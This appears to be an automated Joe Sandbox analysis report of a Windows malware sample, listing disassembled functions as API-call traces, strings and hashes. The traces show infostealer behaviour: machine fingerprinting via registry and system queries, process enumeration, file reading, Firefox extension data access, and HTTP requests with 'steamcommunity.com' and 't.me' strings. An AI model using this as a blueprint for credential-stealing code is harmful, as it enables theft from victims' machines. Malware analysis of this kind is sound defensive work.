                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Desktop$CreateOpenSleeplstrcpymemcpystrlen
                                                                                                                                                                                                                                                                                      • String ID: %s%s"$ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                      • API String ID: 3603158527-2020731023
                                                                                                                                                                                                                                                                                      • Opcode ID: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                      • Instruction ID: f2f5d87aafaa2d86ed8620da2dc3468a3bb05fc034b5e9ecb920fc18406a804c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f957c9f241f1788a6717240c2f5f4c9f278a5156d0a920e059212db3f08382fb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56313771D04344ABDB21EB218D41BEFB774AF95304F00419EF90832192DB786AC5CBAA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 00410B42
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410B50
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?), ref: 00410B68
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,000000FF), ref: 00410B85
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410B8E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ProcessorNameString, xrefs: 00410B7C
                                                                                                                                                                                                                                                                                      • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00410B5E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                      • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                                                                                                                                                                                                                      • API String ID: 3466090806-2804670039
                                                                                                                                                                                                                                                                                      • Opcode ID: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                      • Instruction ID: 414338a11f3689f75f6fdb63b0f136fa5a8568cc8c95f28b9b39ab38a5685d7b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad177650e976e3d35c7c3a9112606bb10243cc343026616705170833e325d11c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04F08230784320BBD3106B24AC0AF5A7A99AB45B51F504029F685A71E1D6A06C508BD5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,00000000,0042150A,0042150A), ref: 00416C6A
                                                                                                                                                                                                                                                                                      • strstr.MSVCRT ref: 00416C82
                                                                                                                                                                                                                                                                                      • strstr.MSVCRT ref: 00416C94
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000EA60,?,0042150A,00000000,0042150A,0042150A), ref: 00416DC7
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpylstrlenstrstr$Sleep
                                                                                                                                                                                                                                                                                      • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                                      • API String ID: 1105026832-5696879
                                                                                                                                                                                                                                                                                      • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                      • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404280: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,0042150A), ref: 00416A2B
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416A46
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,00000000), ref: 00416A6E
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416A8F
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000001,?), ref: 00416AA6
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                                                                                                                      • API String ID: 4174444224-2861137601
                                                                                                                                                                                                                                                                                      • Opcode ID: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                      • Instruction ID: 855039ff49ac9ec10de8df2a88766b452ea63e393e544b77beb2aca96e60e2a3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E418131600219ABCB15EBA2D9529EE7369AF44344F41441EF90267241DF7CBD86CBE9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                      • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharCloseOpenQueryValue
                                                                                                                                                                                                                                                                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                      • API String ID: 47404925-1211650757
                                                                                                                                                                                                                                                                                      • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                      • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                      • Instruction ID: 57bb2ce498e656ac9101d6a6683512ef7afea4cd211be1053fa5c26a8075d75e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e03da7bb686982697c9352cba9d24d53c2a6859cb69aed1fdb7ab7d2ece8e95
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF21DE75204B009FC320EF64C984A6AB7F5FF89354F00482DF996CB2A0D735B945CBA2
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                                      • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                                      • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                      • Instruction ID: 70da7db2db91f88941c3e71440bfa6ebbd6eb466aaac7195974b89fd4c7015d6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA01D431A0665457E3102B386C09BEFB794AF16705F505538F888A2271EB20898586E9
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                                                                                                                      • String ID: Unknown
                                                                                                                                                                                                                                                                                      • API String ID: 277847849-1654365787
                                                                                                                                                                                                                                                                                      • Opcode ID: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                      • Instruction ID: 9523786d007b465f85d219b7e39a8a5dfbdd483b20afe91046872d233f87955e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9201A5313003187BD620B6629C56FEF775E9FC5758F04082EB9455B282DEBCA8C587AA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocGlobalMemoryProcessStatusmemsetwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %d MB
                                                                                                                                                                                                                                                                                      • API String ID: 1522292957-2651807785
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                      • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                      • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                      • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                        • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                        • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(?,00000000,?,?,?,?,?,00421363,0042150A,?,?,?,?,?,?,?), ref: 0040C5DA
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010,00000000,?,0040CC78,00000000,?,?), ref: 0040C5F8
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                      • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                      • Opcode ID: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                      • Instruction ID: e851882c1721239b6607cf2b57b0a0084f57c32a141c23d73fe3fe214d6676a2
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adf5d0fcb4b42b563d8d2014ece056c47c6b9cd30f37acf02c607b39c5062cd4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14616131A107199BCB14FBB1C9D69EE7368AF08308F40455EB91657142EF7CAEC8CBA5
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00416EC0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403090: lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403090: StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403090: InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 00416F77
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                                                      • String ID: ERROR
                                                                                                                                                                                                                                                                                      • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                                                      • Opcode ID: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                      • Instruction ID: 43c13bd387ffc7ea7dd124343602ed7a74854246be98469252eee39eb9cb9d78
